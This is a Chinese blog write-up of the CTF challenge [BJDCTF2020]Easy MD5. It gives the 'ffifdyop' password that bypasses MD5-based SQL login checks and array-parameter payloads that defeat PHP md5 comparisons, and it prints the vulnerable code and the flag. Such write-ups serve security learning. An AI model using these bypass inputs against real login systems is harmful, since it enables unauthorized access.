[BJDCTF2020]Easy MD5

最新推荐文章于 2024-03-28 22:48:03 发布
最新推荐文章于 2024-03-28 22:48:03 发布
阅读量2k 收藏
点赞数
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46266956/article/details/123620668
版权

3X02题目-[BJDCTF2020]Easy MD5

ffifdyop

存在MD5密码登录绕过的,ffifdyop万能密码
存在MD5弱类型比较的,可以用数组或者md5碰撞

在这里插入图片描述

之后转到levels91.php

查看源码发现一段php代码

<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    // wow, glzjin wants a girl friend.
-->

存在MD5弱类型比较的,可以用数组或者md5碰撞

这里构造payload:./levels91.php?a[]=1&a[]=2

转到levell.php

并得到php代码

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

接着post:param1[]=1&param2[]=2

得到flag

flag{ab7744f3-727a-496a-b62c-0487617a48a0}

Jerem1ah
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
MD5.zip_MD5Java_easy _elephantykb
09-21
JAVAMD5加密 很好用的 AVAMD5 encryption is very easy to use
[BJDCTF2020]Easy MD5(详细)
热门推荐
qq_43622442的博客
04-21 1万+
[BJDCTF2020]Easy MD5(详细) 这一题也是挺多知识点的。 1.打开网站,发现输入啥都没变化: 2.看到响应头有提示,应该是绕过md5进行注入了: 3.这里有个很离谱的点,我是真的没想到:          md5函数在指定了true的时候,是返回的原始 16 字符二进制格式。也就是说会返...
[BJDCTF 2020]easy_md5(WP)
最新发布
wikey 的博客
03-28 233
这里有这个东西,因为16位原始二进制格式开头就是’or6’,然后ffifdyop被md5加密后的276f722736c95d99e921722cf9ed621c转换成16位原始二进制格式为’or’6\xc9]\x99\xe9!也就是说 我们用MD5(ffifdyop)可以伪造为原始16位二进制格式,所以我们输入ffifdyop试试。因为md5的特殊性如果传参不是字符串,而是数组,md5()函数无法解出数值,就会返回null所以。因为md5()函数会将我们输入的加密,然后转换成16字符的二进制格式。
[BJDCTF2020]Easy MD5 1
dlccom的博客
04-25 3522
打开靶机只能看见这么个框 看了一下页面源码也没什么信息 是不是有sql注入呢,拿sqlmap跑一下 啥也没! burp抓包看一下 回包有点信息,是个sql查询语句,后面的password经过MD5处理过了,有注入的漏洞 我们只需要把语句拼接为 select * from 'admin' where password=‘xxx’ or ‘1就可以绕过这个语句 那么谁的MD5值可以是这么个东西呢,查了一下有 ffifdyop 所以把这个值写进输入框中 出现了新的页
批量修改视频MD5
03-16
一键批量修改视频MD5,上传到网盘、视频站的时候规避审核
MD5 Checksum Tool v4.1
07-23
NoVirusThanks MD5 Checksum Tool is a free and easy to use application designed to allow users to generate the file checksum (MD5/SHA1 hash) of a file or string. It can be very useful to check if an ...
Easy Touch 5 虚拟摇滚插件
05-06
Unity3d 移动端输入 Easy Touch 5 虚拟摇滚插件
msc.easy5 注册机
01-17
支持esay5 2015及2013的软件注册
[BJDCTF2020]Easy MD5(超级详细)
weixin_73560599的博客
07-29 2193
这题涉及的知识点挺多的,包括md5($pass,true)的注入,php的弱类型比较以及强类型比较 尤其是MD5的注入 非常有意思涉及的内容挺多,开阔视野以及知识
[BJDCTF 2020]easy_md5
jayq1的博客
07-14 533
考点:响应包 php 弱比较
ctf中MD5绕过详细总结及例题[BJDCTF2020]Easy MD5
m0_56691564的博客
10-18 4613
MD5()函数简单了解及ctf中常见绕过技巧,结尾附加例题。
详解 [BJDCTF 2020]easy_md5
m0_73255659的博客
11-26 520
题目只有一个输入框找找提示:查看源代码 查看数据包 找到了:我们可以看到 hint 有一个提示点。
easy sysprep v5
07-30
Easy Sysprep V5 是一款方便使用的系统准备工具。它可以帮助用户轻松地进行系统部署和准备工作。它支持多种操作系统版本,包括 Windows XP、Windows 7、Windows 8、Windows 10 等。 Easy Sysprep V5 具有很多实用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Jerem1ah

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值